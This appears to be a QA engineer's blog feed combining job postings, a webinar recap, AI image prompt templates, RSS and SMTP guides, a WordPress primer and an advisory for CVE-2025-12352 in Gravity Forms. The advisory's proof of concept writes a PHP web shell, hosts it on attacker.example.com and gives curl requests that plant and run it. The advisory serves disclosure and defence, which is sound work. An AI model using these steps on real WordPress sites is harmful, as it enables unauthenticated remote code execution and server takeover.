Abu Hurayra

We are looking for experienced Software QA professionals with capturing and transforming business requirements into detailed test scenarios. The ideal candidates should be keen to learn new tools and technologies and then implement them in daily activities. The person should be dynamic and positive in mindset and attitude.

Key Responsibilities

Analyze business requirements and technical specifications of any new application and convert functional specifications, wireframes, user cases into test documents.
Conduct all types of application testing as needed, such as integration, system, regression, exploratory, UI, and acceptance to ensure the highest levels of quality.
Analyze formal test results to discover and resolve defects, bugs, errors, configuration issues, and interoperability flaws.
Design and implement automated test frameworks for functional, integration, and end-to-end testing.
Develop automated test scripts and utilities to validate APIs and backend services using a test automation framework.
Build and run load/performance tests to validate system scalability.
Collaborate with engineers and product managers to define test strategies and catch issues early.
Integrate automated test suites into CI/CD pipelines.
Contribute to QA best practices, tooling, and overall quality culture.

Required Skills & Qualifications

2+ years of experience in software quality assurance and testing.
B.Sc in Computer Science/Engineering or equivalent.
Excellent skills in analyzing and solving complex, multi-step problems.
Possess an investigative attitude while testing the product.
Knowledge on Programming languages (C#, Java, Python or Javascript).
Experience with software test automation tools like Playwright, Selenium, pytest, Robot Framework, etc.
Familiarity with load/performance testing tools (e.g., Locust, JMeter, k6).
Experience integrating tests into CI/CD pipelines (GitHub Actions, Jenkins, etc.).
Experience testing APIs, distributed systems, or backend services.
Experience with any relational database like MSSQL, Mysql, etc. is required.
Must be familiar working with one source control (i.e. Git, SVN), should be proactive in attitude with a positive mindset.
Ability to visualize real-time business situations and scenarios.
Able to capture and transform business requirements into detailed test scenarios.
Keen to learn new tools and technologies then implement them in daily activities.
Solid understanding of QA methodologies and test automation best practices.
A strong desire to learn and develop technical skills.
Excellent written and verbal communication skills.
Familiarity with AWS cloud platform is a plus.
Experience testing asynchronous or distributed architectures is a plus.
Exposure to monitoring/observability tools is a plus.

Benefits

Performance-based bonus
Eid festival bonus
Hybrid work model
Complementary meals and snacks
Two weekly holidays

About Enosis Solutions

Enosis Solutions is an engineering powerhouse and trusted partner for software development and testing services. We design and develop web, desktop, and mobile applications for our clients that are compelling, interactive, and easy to use. Since our inception, we have been providing operational gains to startup, emerging, and established organizations throughout North America and Europe.

Senior DevOps Engineer - Enosis - December 2025+

Senior DevOps Engineer - Enosis - December 2025

Circular URL: https://enosisbd.pinpointhq.com/en/postings/4168382a-8fc0-4897-9710-847c1a67b1c1

Wayback Machine URL:

Certificate of Participation - Abu Hurayra

As a Senior DevOps Engineer at Enosis Solutions, you will drive software delivery efficiency by implementing and optimizing DevOps practices. You will collaborate with cross-functional teams to automate infrastructure, manage cloud resources, and ensure system scalability, security, and reliability. Leveraging your expertise in CI/CD, networking, cloud technologies, containerization, and monitoring tools, you’ll deliver impactful solutions, and foster continuous improvement.

Key Responsibilities

Design, implement, and manage scalable AWS cloud infrastructure, with expertise in Azure and GCP considered a plus.
Implement and maintain configuration management solutions using Chef, with knowledge of Ansible and Terraform as a plus.
Design, implement, and manage CI/CD pipelines, ensuring alignment with best practices.
Support production environments by monitoring system performance, availability, and reliability.
Collaborate with teams to streamline deployment processes.
Participate in troubleshooting and resolving infrastructure and deployment issues.
Lead initiatives in cloud migration, cost optimization, and service performance improvement.
Set up and maintain monitoring and observability tools such as Prometheus, Grafana, and Datadog, including alerts and dashboards.
Participate in incident, change, problem, and release management, supporting production environments with on-call duties, including late nights and weekends as required.
Learn and apply security best practices across automation and cloud systems.
Stay updated with industry trends, share knowledge with the team, and mentor junior engineers.

Required Skills & Qualifications

2+ years of hands-on DevOps experience, with practical expertise in Infrastructure as Code (IaC) tools such as AWS CloudFormation and Terraform.
B.Sc in Computer Science/Engineering or equivalent.
Practical experience with provisioning, configuration, and automation of systems using tools such as Packer, Chef, and Ansible.
Proficient in scripting or programming languages such as Python and Bash for automation and operational tasks.
Solid understanding of CI/CD concepts; experience with Jenkins, GitLab CI, or similar tools is preferred.
Familiarity with security and compliance standards, including SOC 2 and PCI DSS.
Strong proficiency in cloud technologies, with a focus on AWS; experience with Azure and GCP is a plus.
Proficient with version control systems (e.g., Git).
Working knowledge of containerization and orchestration (e.g., Docker, Kubernetes).
Experience with monitoring and observability tools such as Prometheus, Grafana, and Datadog.
Familiarity with database management systems in cloud environments (e.g., MySQL, PostgreSQL, SQL Server, AWS RDS, Azure CosmosDB).
Excellent communication and collaboration skills, with the ability to work effectively in a distributed or remote team.
Strong problem-solving skills and the ability to work independently.

Benefits

Performance-based bonus
Eid festival bonus
Hybrid work model
Complementary meals and snacks
Two weekly holidays (Saturday & Sunday)

About Enosis Solutions

ISTQB Certification Journey: Tech X Webinar Full Recap

hello@hurayraiit.com (Abu Hurayra) — Sat, 13 Dec 2025 00:00:00 GMT

Info

Event Schedule: 13th December 2025 || 9 pm to 11 pm

Details:

Webinar Title: ISTQB: The Full Journey
Host: Tech X
Date: Saturday, December 13th, 2025
Attendance Time: Please attend the Zoom session at 8:45 PM BST (Bangladesh Standard Time).
Start Time: The webinar will begin sharp at 9:00 PM BST.
Format: Online Webinar via Zoom.

Objectives:

A clear roadmap for ISTQB certification preparation.
Insights into common pitfalls and best practices in software testing.
A valuable chance to engage directly with our senior QA experts and speakers during the live Q&A session.

Recording of the keynote speech by the chief guest: https://drive.google.com/file/d/1wGHAGjENH5gqp_hqngt5nZO_FrGtH2Fd/view?pli=1

Official Webinar Recording:
Part 01
Part 02

Event Photos

Event Cover Photo

Chief Guest: Dr Muhammad Nuruzzaman

1️⃣ Dr Mohammad Nuruzzaman ( Chief Guest )

🔺Daffodil Group CEO
🔺 President: Bangladesh Software Testing Board (BSTB)
🔺 Bangladesh Representative: ISTQB (International Software Testing Qualifications Board)
🔺 Bangladesh Representative: TMMi Foundation
🔺 Treasurer: Global Entrepreneurship Network (GEN) Bangladesh
🔺 Vice President: Bangladesh Wushu Federation

LinkedIn: https://www.linkedin.com/in/nzamaan/

Speaker: Joel Oliveira

2️⃣ Joel Oliveira ( Special Guest )
🔺 Governance Chair at ISTQB
🔺 Head Of Quality Assurance at Celfocus
🔺 General Assembly President at PSTQB

Keynote Speaker: Md Arif Chowdhury

Md Arif Chowdhury
Senior IT Consultant (QA)
BACS & iBAS ++ Scheme, SPFMS
ISTQB Instructor

3️⃣ Md Arif Chowdhury ( Keynote Speaker )
🔺 Senior IT Consultant (QA)
🔺 BACS & iBAS ++ Scheme, SPFMS
🔺 ISTQB Instructor

Speaker: Mahmudul Islam Oly

4️⃣ Mahmudul Islam
🔺 ISTQB 4.0 Certified with 95%
🔺 Exam Attempt from Home
🔺 SQA Instructor

Links Shared In The Event

BSTB Management Body: https://bstb-bd.org/management-body/
Bangladesh Software Testing Board: https://bstb-bd.org/
BSTB Examinations: https://bstb-bd.org/examinations/
CEH Certification: https://www.eccouncil.org/train-certify/certified-ethical-hacker-ceh/
ISTQB Website: https://istqb.org/
ISTQB CTFL v4.0 Overview: https://istqb.org/certifications/certified-tester-foundation-level-ctfl-v4-0/
ISTQB Prep: https://www.istqbprep.com/
Clubs in SQA Field: https://skillsclub.com/
ISTQB Successful Candidate Register: https://scr.istqb.org/
ISTQB Self Study Guide Book: Links to amazon
Book on Software Testing: https://shop.bcs.org/page/detail/?k=9781780176383
ISTQB Glossary: https://glossary.istqb.org/en_US/search?term=&exact_matches_first=true

Slides

Joel Oliveira's Talk

I missed the first 4 slides 😥

Md Arif Chowdhury's Talk

The speaker forgot to screen-share the slides 😅

Mahmudul Islam Oly's Talk

Certificate

The Muslim Creator’s Guide to Ethical AI Image Generation

hello@hurayraiit.com (Abu Hurayra) — Tue, 09 Dec 2025 00:00:00 GMT

Generative AI is an incredible tool for creativity, but for Muslims and content creators adhering to Islamic values, navigating standard prompts can be tricky. You often run into issues with the depiction of animate beings (faces and animals) or unintended haram elements. However, limitations often breed the most beautiful creativity. By focusing on architecture, nature, calligraphy, and geometry, you can create stunning, spiritually uplifting visuals that fully respect Islamic guidelines.

Here are six adapted prompt structures designed to help you generate professional, high-quality images that are compliant with Islamic values.

1. Photorealistic Architectural Serenity

Description & Use Case:

This style is perfect for creating calming backgrounds for quotes, website headers, or social media posts about mindfulness (Taqwa). Instead of focusing on people, we focus on the atmosphere, lighting, and the beauty of structural design, such as mosques or courtyards.

Template:

A photorealistic [shot type] of [architectural feature or nature scene], set in [location/environment], illuminated by [lighting description], creating a [mood] atmosphere. The image should be devoid of people or animals, focusing strictly on textures, geometry, and light. Captured with [camera details], highlighting [specific details].

Example Prompt:

Generate a photorealistic wide-angle shot of a traditional mosque courtyard in Andalusia during the golden hour. The scene features a symmetrical marble fountain in the center with flowing water, surrounded by intricate geometric tile work and arches. The lighting is warm and soft, casting long shadows from the pillars. The atmosphere is peaceful and silent. No people or animals in the frame. High resolution, sharp focus on the water ripples and tile textures.

2. Geometric & Floral Sticker Art

Description & Use Case:

Need assets for a digital planner, a Ramadan journal, or a logo? This method creates clean, sticker-style illustrations. We replace character-based stickers with complex Islamic geometry (Arabesque) or floral patterns that can be used as decoration or branding elements.

Template:

A hyper-realistic digital sticker-style illustration of [object or pattern], featuring key details like [texture/material]. The design should be symmetrical and elegant, with clean outlines and a white background. No animate beings.

Example Prompt:

A hyper-realistic digital illustration of an intricate Islamic geometric star pattern, rendered in gold and deep teal enamel. The design features raised metallic edges catching the light, giving it a 3D enamel pin look. The background is pure white to allow for easy cutting. No faces or animals, strictly geometric and floral motifs.

3. Typography & Quranic Verses on Walls

Description & Use Case:

AI is getting much better at rendering text. Use this to create mockups of wall art, interior design inspiration, or daily reminders. This prompts the AI to place English translations of Quranic verses or Islamic values (like "Sabr" or "Salam") into realistic interior settings.

Template:

Create a [image type] of a modern interior wall. The focal point is a framed artwork featuring the text "[Text to Render]" in [Font Style]. The room design is [style description] with [lighting]. Ensure the text is spelled correctly and is the central focus.

Example Prompt:

Create a close-up photo of a textured beige wall in a minimalist living room. Hanging on the wall is a sleek wooden frame containing bold, modern serif text that reads: "Indeed, with hardship comes ease." Sunlight is streaming in from a nearby window, casting the shadow of a plant (leaves only) across the wall. The text is crisp, black, and perfectly centered. Realistic lighting, high definition.

4. Halal Product Mockups (Oud, Dates, Prayer Beads)

Description & Use Case:

If you run an e-commerce store selling Halal goods, you don't need a physical studio. You can create "hero shots" for products like perfumes (Attar), prayer mats, or Misbahas (prayer beads). The key is dramatic lighting and a setting that evokes luxury and tradition without using human models.

Template:

A high-resolution, studio-lit product photograph of [product description] on a [surface material]. The lighting is [lighting setup] to enhance the [material quality, e.g., glass/wood]. Atmospheric effects like [smoke/mist/light rays] surround the object. No hands or human figures visible.

Example Prompt:

Create an ultra-cinematic hero shot of a crystal bottle of Oud perfume sitting on a piece of dark, polished mahogany wood. The bottle is illuminated by moody, rim lighting that highlights the amber color of the liquid inside. Surrounding the bottle is a very subtle, swirling incense smoke. The background is deep black to make the product pop. Focus is sharp on the bottle label.

5. Event & Community Posters (No Faces)

Description & Use Case:

Designing flyers for Eid prayers, charity drives, or mosque lectures often requires a professional touch. This prompt helps you create a layout that includes a headline and decorative elements (like lanterns or crescents) while keeping the imagery strictly inanimate.

Template:

Design a professional promotional poster for [Event Name]. Composition: A cinematic close-up of [Subject, e.g., Lantern/Book] on a [Surface]. Main Title: '[Headline Text]' in [Font Style] at the top. Footer text: '[Bottom Text]'. The design should be inviting and spiritual, using a [Color Palette].

Example Prompt:

Design a professional promotional poster for a Charity Drive. Composition: A cinematic close-up of a pair of hands (generic silhouette only, no detailed features) or simply an open wooden box filled with golden coins and grain on a table. Text Integration: Main Title: 'Ramadan Charity' written in elegant gold typography at the top. Footer: 'Give Generously' in small, clean white text at the bottom. The background is a deep, blurred midnight blue.

6. Islamic Finance & Data Visualization

Description & Use Case:

For educational content, presentations, or blogs about Islamic finance or demographics, you need charts that look modern but fit the aesthetic. This prompt generates data visuals using brand colors often associated with Islamic themes (greens, golds, whites) or neutral tones.

Template:

Create a [chart type] visual. The design should be in a [art style] with bars/segments themed as [styling/colors]. Keep the chart clean, accurate, and use a [background style]. No characters or mascots.

Example Prompt:

Create a 3D isometric bar chart showing growth. The bars are textured like gold bullion blocks, set against a clean white marble background. The chart is minimalist and professional, symbolizing wealth growth in Islamic finance. Text labels are sharp and legible.

Conclusion

Creating content that aligns with Islamic values doesn't mean sacrificing quality or aesthetic appeal. By shifting the focus from human figures to the breathtaking beauty of geometry, light, architecture, and the written word, you can use AI to produce art that is both cutting-edge and spiritually compliant. Use these templates as your starting point, and watch your halal portfolio grow.

Essential RSS Feeds for QA & DevOps Engineers [2026]

hello@hurayraiit.com (Abu Hurayra) — Mon, 08 Dec 2025 00:00:00 GMT

In the fast-moving world of test automation, QA strategy, and DevOps, staying updated with tools, practices, and industry trends is critical. Whether you're building scalable automated test suites, integrating security checks into your CI/CD pipeline, or keeping pace with evolving frameworks like Cypress or Playwright—curated RSS feeds can help you stay sharp and ahead of the curve.

This post compiles hand-picked, high-signal RSS feeds specifically for SDETs, QA engineers, automation architects, and DevSecOps professionals. The feeds are grouped into categories to help you zero in on what matters most to your role.

🧪 Testing Frameworks and Tools

1. Cypress Blog
Feed: https://www.cypress.io/feed.xml
Tips, tutorials, and framework updates for Cypress—ideal for UI and E2E test automation.

2. Selenium Releases (GitHub Atom)
Feed: https://github.com/SeleniumHQ/selenium/releases.atom
Track new versions of Selenium, changelogs, and release notes.

3. Cucumber Blog
Feed: https://cucumber.io/blog/feed/
Everything BDD and Gherkin. Great for test automation engineers implementing behavior-driven testing.

4. JUnit Releases
Feed: https://github.com/junit-team/junit5/releases.atom
Keep tabs on Java’s go-to testing framework.

⚙️ Automation Engineering Practices

5. Automation Panda
Feed: https://automationpanda.com/feed
Andrew Knight’s deep dives on Python testing, testing strategies, and automation design patterns.

6. Ultimate QA
Feed: https://ultimateqa.com/feed
Nikolay Advolodkin covers practical test automation strategies, tools, and frameworks.

7. Gurock (TestRail Blog)
Feed: https://feeds.feedburner.com/gurock
Focuses on test management, automation integration, and QA process improvement.

8. Software Testing Help
Feed: https://feeds.feedburner.com/softwaretestinghelp
Broad-spectrum QA content—from tool tutorials to process and certification advice.

🚀 CI/CD, DevOps, and Infrastructure Testing

9. Jenkins Blog
Feed: https://feeds.feedburner.com/jenkinsci/jenkins
Pipeline automation, plugin development, and integration insights for Jenkins users.

10. DevOps.com
Feed: https://devops.com/feed
News and opinion pieces on DevOps culture, CI/CD, testing, and delivery pipelines.

11. DZone DevOps
Feed: https://feeds.dzone.com/devops
Practical DevOps articles and tutorials for test and release engineers.

12. Terraform by HashiCorp Blog
Feed: https://www.hashicorp.com/blog.atom
Best for engineers dealing with test environment automation and infrastructure-as-code.

🧑‍💻 Programming & Scripting for Automation

13. Real Python
Feed: https://realpython.com/atom.xml
Essential Python techniques, including test automation with pytest, API testing, and CLI tools.

14. Baeldung (Java + Spring)
Feed: https://feeds.feedburner.com/BaeldungMain
Covers Java automation patterns, Spring-based testing, and framework integration.

15. JavaScript Weekly
Feed: https://javascriptweekly.com/rss
Staying current in the JavaScript ecosystem is key if you’re using Playwright, Jest, or Cypress.

🛡️ Security Automation & DevSecOps

16. OWASP Blog
Feed: https://owasp.org/blog/feeds/posts/default?alt=rss
Official updates on OWASP tools and secure testing best practices.

17. Veracode Blog
Feed: https://www.veracode.com/blog/feed
Posts on secure SDLC, automated vulnerability detection, and code quality.

18. Checkmarx Blog
Feed: https://checkmarx.com/feed
Explores SAST/DAST techniques and secure development practices for automation.

19. Qwiet.ai (formerly ShiftLeft)
Feed: https://qwiet.ai/feed
Covers API security, DevSecOps integrations, and real-world security testing workflows.

👥 QA Community and News Aggregators

20. Ministry of Testing
Feed: https://feeds.feedburner.com/mottestingfeeds
A goldmine of community-sourced QA insights, AMAs, and event updates.

21. Hacker News (Tech News)
Feed: https://news.ycombinator.com/rss
Wider tech headlines, often featuring testing tools, security breaches, and productivity hacks.

22. /r/QualityAssurance (Reddit)
Feed: https://www.reddit.com/r/QualityAssurance/.rss
Crowd-sourced discussions on QA careers, tooling, automation trends, and bug tales.

23. GitHub Trending (via RSSHub)
Feed: e.g., https://rsshub.app/github/trending/javascript/daily
Track fast-growing repos across test automation, CI/CD tooling, and security frameworks.

Wrap-Up

With these RSS feeds in your arsenal, you can turn your feed reader into a personal QA command center—tracking updates on frameworks, security tooling, CI/CD infrastructure, and test strategies in real time. Bookmark your favorites, subscribe to your reader of choice (like Feedly, Inoreader, or Thunderbird), and feed your curiosity!

Free SMTP Options for SQA & Automation Engineers [2026]

hello@hurayraiit.com (Abu Hurayra) — Sun, 07 Dec 2025 00:00:00 GMT

Email testing shows up in almost every type of application we work with — WordPress sites, Laravel apps, SaaS dashboards, custom APIs, Dockerized microservices, you name it. And as SQA or Automation Engineers, we need a reliable way to send and verify emails during functional testing, regression runs, pipeline executions, and even local development.

Most SMTP providers either require a credit card, impose strict rate limits, or block test traffic when they detect “non-production” patterns. However, several SMTP providers offer free, no-credit-card plans that work perfectly for testing environments.

This guide walks you through the best free SMTP options, how I personally use them in my workflow, and how you can build a reliable fallback system that fits neatly into your SQA toolkit.

Why SQA Engineers Need Free SMTP Providers

As testers, we’re constantly validating:

Account registration flows
Password reset emails
Notification triggers
Transactional messaging
Webhooks that depend on email events
Email formatting (HTML vs. text), headers, deliverability behavior
Automation scripts that simulate actual user operations

Having an SMTP provider attached to your test deployments makes these checks trivial. But paid providers aren’t practical for everyday QA work.

The SMTP Services I Use (in priority order)

1. Brevo — up to 300 emails/day

The free plan allows 300 emails per day. (help.brevo.com)
You can store up to 100,000 contacts even on the free plan. (help.brevo.com)
No time limit on the free plan — it's free forever. (help.brevo.com)
Includes SMTP / transactional email support, so it works well for web apps, WordPress, and custom applications. (help.brevo.com)

Why it’s great for QA:
300 emails/day is usually sufficient for most test cycles, and you get a fairly large contact storage limit. For testing flows like sign-up, password reset, order confirmation, notifications — that’s more than enough for many developers.

2. Resend — 100 emails/day

On the free plan, you get a daily sending limit of 100 emails/day. (Resend)
Supports SMTP Relay, REST API, SDKs, scheduling, batch sending, plus tracking features like open-tracking, link-tracking. (Resend)

Why testers might like it:
Simple, predictable, developer-friendly. Good for predictable, low-volume email testing (e.g. transactional emails, password resets, sign-up flows). Also useful if your primary (Brevo) hits its limit or you want a clean, separate sandbox environment.

3. Maileroo — 3,000 emails/month

Their free SMTP plan offers up to 3,000 outbound emails/month. (maileroo.com)
They claim “no credit card required” for the free plan. (maileroo.com)
Good for light to moderate-volume testing — especially useful if you occasionally need multiple emails per user (e.g. invites, notifications, bulk test emails). (maileroo.com)

Why it’s a useful fallback:
If you’re hitting limits on daily-based providers, Maileroo gives you a monthly-based buffer. For example, if you send a few emails per user but have many users or many test runs per day, 3,000/month gives you breathing room.

I Use Them in This Specific Order

For SQA and automation work, reliability and quota matter more than anything else.

My priority order:

Brevo → stable, predictable, generous daily limit
Resend → clean logs, fast, perfect for debugging
Maileroo → great monthly buffer for bulk or stress-testing email flows

This setup ensures I almost never run out of SMTP capacity during heavy testing cycles, especially when working across multiple WordPress and custom application instances.

How SQA Engineers Can Integrate These Easily

WordPress Testing

Use plugins like Fluent SMTP or directly update wp-config.php with SMTP constants. Great for testing registration, WooCommerce order emails, LMS notifications, etc.

Laravel / PHP Apps

Drop SMTP credentials into .env, for example:

MAIL_MAILER=smtp
MAIL_HOST=smtp.yourprovider.com
MAIL_PORT=587
MAIL_USERNAME=youruser
MAIL_PASSWORD=yourpass
MAIL_ENCRYPTION=tls

Docker-Based Apps

You can bind a .env file with SMTP values or inject them via runtime variables in docker-compose.yml.

Best Practices for QA Email Testing

Reset your sender name for each test app
Use unique subject prefixes like DEV: or QA:
Rotate between providers during long test cycles
Avoid spam-trigger keywords in automated messages
Log email events inside your automation framework

This helps keep your test emails clean and consistent.

Final Thoughts

If you’re an SQA or Automation Engineer, you do not need to pay for SMTP just to test email flows. These free providers — Brevo, Resend, and Maileroo — give you everything needed for functional tests, automation pipelines, and even staging environments.

The three-layer fallback system keeps you safe from rate limits and ensures uninterrupted testing across all your apps. It’s a simple setup that saves money, reduces friction, and keeps your test environments fully capable.

What Is WordPress? A Complete Beginner's Guide [2026]

hello@hurayraiit.com (Abu Hurayra) — Sun, 07 Dec 2025 00:00:00 GMT

As you already may have heard, WordPress is a CMS, a Content Management System (but it can be much more). It is free and open source. If you google WordPress, you may get confused by the search results. Here is a simple instruction to solve that confusion:

WordPress.com is NOT WordPress.
WordPress.org is WordPress

Everything you need to know is available in the website WordPress.org. From themes, plugins, documentations, news, and everything else. But I want to take a different approach. I will list some common questions I get asked about WordPress and provide answers to those. The answers might not be perfect, but these are what I know at the time of writing this article. I can update them later.

Question 01: How can I create a website using WordPress and explore it for free?

Answer:

The answer to this question can be both simple and complex. In order to create a website using WordPress, you need a machine to run that website on, like a Ubuntu VPS, and a webserver like nginx or apache or openlitespeed, PHP and a database like MySQL or MariaDB, and so many more things.

But we will not get into those. If you are familiar with platforms like Shopify: Shopify manages everything that I mentioned just now; from servers, to databases, to everything else needed and you as a user just have to create an account and start exploring. But with WordPress, you need to do that bit yourself.

I will make it super easy for you. I am guessing that you already have a laptop or a desktop computer running Windows, MacOS or Linux. Just visit LocalWP and download the tool for your specific operating system. Then install it. That's it!

After installation completes, create a new WordPress site by following the steps and access it from your browser. Here is a simplified video demonstrating the steps:

Now that you can access the WordPress website from your browser, go ahead and explore the plugins, themes and everything else. You can find lots of tutorials online for this. However, the best resources for learning the basics of WordPress is here: https://learn.wordpress.org/

With WordPress, everything is free, there are 60,000+ plugins, themes, everything can be downloaded for free. Companies like WPDeveloper, where I work at, provides a free version of some plugins, but a paid premium version too, with advanced features. But most task can be completed with the free plugins alone. Just visit the plugin directory and the theme directory.

CVE-2025-12352: Arbitrary File Upload in Gravity Forms

hello@hurayraiit.com (Abu Hurayra) — Sat, 06 Dec 2025 00:00:00 GMT

CVE-2025-12352 is a CVSS 9.8 Critical unauthenticated arbitrary file upload vulnerability in the Gravity Forms WordPress plugin. It affects all versions up to and including 2.9.20. An unauthenticated attacker can upload any file — including a PHP web shell — directly to the WordPress uploads directory. On servers where allow_url_fopen is enabled and PHP executes from the uploads directory, this leads to full remote code execution without any credentials.

Vulnerability Summary

Field	Value
Plugin Name	Gravity Forms
Plugin Slug	`gravityforms`
CVE ID	CVE-2025-12352
CVSS Score	9.8 (Critical)
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Vulnerability Type	Unauthenticated Arbitrary File Upload
Affected Versions	<= 2.9.20
Patched Version	2.9.21
Published	November 7, 2025
Researcher	Talal Nasraddeen
Wordfence Advisory	Link

Description

The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to and including 2.9.20. The flaw is in copy_post_image(), which copies files from a user-supplied URL to the WordPress media directory. It does not verify that the URL belongs to the plugin's own upload folder. When allow_url_fopen is On in PHP, an unauthenticated attacker can point this function at an external PHP script. The file is fetched and saved with no extension or MIME-type check — which can lead to remote code execution on the affected server.

Technical Analysis

Vulnerable Code Path

Entry point — form submission POST handler

When a Gravity Forms form is submitted, the plugin reads the gform_uploaded_files POST parameter (a JSON-encoded array) and stores its contents in the static GFFormsModel::$uploaded_files global cache via set_uploaded_files().

File: forms_model.php, function set_uploaded_files() (line ~8520)

public static function set_uploaded_files( $form_id ) {
    $files = GFCommon::json_decode( rgpost( 'gform_uploaded_files' ) );
    // ...
    foreach ( $files as $input_name => &$input_files ) {
        // ...
        if ( isset( $file['url'] ) ) {
            $file['url'] = esc_url_raw( $file['url'] );  // Only sanitizes, does NOT restrict to local URLs
        }
        // ...
    }
    self::$uploaded_files[ $form_id ] = $files;
}

The url key in gform_uploaded_files is only sanitized with esc_url_raw(), which cleans URL formatting but allows any valid URL — including external ones.

Field value retrieval — get_submission_files() and get_single_file_value()

File: includes/fields/class-gf-field-fileupload.php, line ~1050

} elseif ( ! empty( $files['existing'][0]['url'] ) ) {
    if ( GFCommon::is_valid_url( $files['existing'][0]['url'] ) ) {
        GFCommon::log_debug( __METHOD__ . '(): Saving provided URL, not uploading file.' );
        $value = $files['existing'][0]['url'];   // External URL saved with NO extension check
    }
}

GFCommon::is_valid_url() only confirms the string is a well-formed URL. It does not check whether the URL points to an allowed file type or whether it is local to the site.

Post data assembly — get_post_data_for_save()

File: forms_model.php, line ~4819

case 'post_image':
    $ary  = ! empty( $value ) ? explode( '|:|', $value ) : array();
    $url  = count( $ary ) > 0 ? $ary[0] : '';
    // ...
    array_push( $images, array( 'field_id' => $field->id, 'url' => $url, ... ) );
    break;

The URL (which may now be an external PHP file URL) is assembled into the post_data['images'] array.

Post creation — create_post() calls media_handle_upload()

File: forms_model.php, line ~5220

$media_id = self::media_handle_upload( $image['url'], $post_id, $image_meta );

The vulnerable sink — copy_post_image()

File: forms_model.php, line 5451 (vulnerable version tag 2.9.20)

private static function copy_post_image( $url, $post_id ) {
    // ...
    $name     = wp_basename( $url );              // Derives filename from attacker-controlled URL
    $filename = wp_unique_filename( $upload_dir['path'], $name );
    $new_file = $upload_dir['path'] . "/$filename";

    // Source path — NO check that $url belongs to GF uploads directory
    $upload_root_info = GF_Field_FileUpload::get_upload_root_info( $form_id );
    $path = str_replace( $upload_root_info['url'], $upload_root_info['path'], $url );
    // If $url is an external URL, str_replace changes nothing; $path remains the external URL

    if ( ! copy( $path, $new_file ) ) {   // PHP copy() fetches the remote URL when allow_url_fopen=On
        return false;
    }
    // ... no file type/extension validation before or after copy
}

Root Cause

The copy_post_image() function accepts the $url argument without checking where it comes from. It tries to convert the URL to a local path using str_replace(). But if the URL does not start with the GF upload root URL, str_replace() changes nothing — and $path stays as the external URL. PHP's native copy() function can fetch remote URLs as its source when allow_url_fopen is enabled in php.ini. This lets it download and save any remote file to the uploads directory, with no extension or MIME-type check.

Bypassed Security Controls

The regular Gravity Forms file upload flow does enforce extension and MIME-type validation via GFCommon::check_type_and_ext() and GFCommon::file_name_has_disallowed_extension(). However, these checks apply only to files submitted via $_FILES (direct HTTP file upload). The copy_post_image() code path is a separate, internal mechanism designed to copy an already-uploaded image into the WordPress media library. No check was ever added to block URLs coming from outside the plugin's own upload directory.

The attacker submits the url key inside gform_uploaded_files in the POST body. Gravity Forms treats this as a "dynamically populated" or "previously uploaded" file URL. That code path skips all file type validation.

Attack Impact

An unauthenticated attacker can upload a PHP web shell (or any other executable file) to the WordPress uploads directory. Many servers run PHP from the uploads directory unless an .htaccess rule blocks it. In that case, the attacker gains unauthenticated Remote Code Execution (RCE): full server compromise, data theft, backdoor installation, or site defacement.

Proof of Concept

Disclaimer: This PoC is provided for educational and defensive security research purposes only.

Prerequisites

WordPress installation with the Gravity Forms plugin installed and activated
Plugin version <= 2.9.20
A form with post creation enabled (form settings → "Create Post") and a Post Image field added
PHP server configuration: allow_url_fopen = On (the default in many hosting environments)
A web shell file hosted at an attacker-controlled URL

Step-by-Step Reproduction

Step 1: Identify a form ID with post creation and a Post Image field

Inspect the page source of any page containing a Gravity Forms form. Find the form ID from the hidden input or the form's data-formid attribute. Also find the Post Image field ID (the input_N name where N is the field ID).

# Example: form ID is 1, post image field ID is 3
# The input name for the post image field would be: input_3

Step 2: Host a PHP web shell at an attacker-controlled URL

# On your attacker server (e.g., http://attacker.example.com/shell.php):
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80

Step 3: Submit the form with a crafted gform_uploaded_files parameter

Replace SITE_URL, FORM_ID, NONCE, and field ID values as appropriate. The gform_uploaded_files JSON tells Gravity Forms that a file has already been uploaded at the external shell URL.

curl -s -X POST "https://TARGET_SITE/wp-admin/admin-ajax.php" \
  -d 'action=gform_get_form_filter' \
  --cookie "" 2>/dev/null

# First, fetch the form page to get the nonce and form fields:
curl -s "https://TARGET_SITE/the-page-with-the-form/" -o form_page.html

# Extract the nonce value from the response:
grep -oP 'gform_ajax_frame_[^"]+' form_page.html | head -1

Step 4: Submit the crafted form

curl -s -X POST "https://TARGET_SITE/" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode 'gform_submit=1' \
  --data-urlencode 'is_submit_1=1' \
  --data-urlencode 'gform_unique_id=exploit-test' \
  --data-urlencode 'state_1=[]' \
  --data-urlencode 'gform_target_page_number_1=0' \
  --data-urlencode 'gform_source_page_number_1=1' \
  --data-urlencode 'gform_field_values=' \
  --data-urlencode 'input_3=' \
  --data-urlencode 'gform_uploaded_files={"input_3":[{"url":"http://attacker.example.com/shell.php","id":"aaaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"}]}'

Step 5: Locate the uploaded shell in the media library

After a successful form submission, Gravity Forms creates a post with the copied image as its featured media. The copied file will appear in:

/wp-content/uploads/YYYY/MM/shell.php

The exact URL can be found in the WordPress media library or by browsing the uploads directory.

Step 6: Execute commands via the uploaded web shell

curl "https://TARGET_SITE/wp-content/uploads/2025/11/shell.php?cmd=id"
# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Expected Result

The PHP web shell shell.php is stored in the WordPress uploads directory and is executable by the web server, giving the attacker unauthenticated remote code execution on the target host.

Verification

Confirm successful exploitation by:

Checking the WordPress Media Library for a new attachment with the name shell.php (or shell-1.php, etc.)
Issuing a GET request to the uploaded shell URL with a cmd parameter and receiving OS command output
Running SELECT * FROM wp_posts WHERE post_mime_type = 'application/x-php' LIMIT 5; against the database to confirm the attachment was registered

Patch Analysis

What Changed

The fix was introduced in Gravity Forms 2.9.21. The only changed file is:

forms_model.php — copy_post_image() function

Fix Explanation

The patch adds two guards before the copy() call:

URL origin check — the supplied URL must start with the GF upload root URL. External URLs are rejected immediately.
Local file existence check — the resolved local path must exist on disk before the copy runs.

These two guards together completely close the attack surface: external URLs are rejected, and only files already present in the GF upload directory can be processed.

Code Diff (Key Changes)

--- forms_model.php (2.9.20 — vulnerable)
+++ forms_model.php (2.9.21 — patched)

@@ -5490,7 +5490,13 @@ private static function copy_post_image( $url, $post_id ) {

